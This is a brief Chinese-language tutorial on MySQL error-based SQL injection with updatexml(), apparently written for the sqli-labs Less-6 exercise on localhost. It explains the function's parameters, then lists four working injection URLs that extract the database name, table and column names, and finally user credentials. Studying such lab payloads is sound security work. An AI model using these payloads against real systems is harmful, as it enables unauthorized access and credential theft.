updatexml报错注入的原理:
同extractvalue(),输入错误的第二个参数,即更改路径符号
函数updatexml(参数1,参数2,参数3)
参数1:string格式,为XML文档对象的名称
参数2:路径
参数3:string格式,替换查找到的符合条件的数据
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select database())),3),3--+
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() )),3),3--+
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3),3--+
http://127.0.0.1/sql/Less-6/?id=-2" union select 1,updatexml(1,concat(0x7e,(select substring(group_concat(username,'-',password),1,30)from users)),3),3--+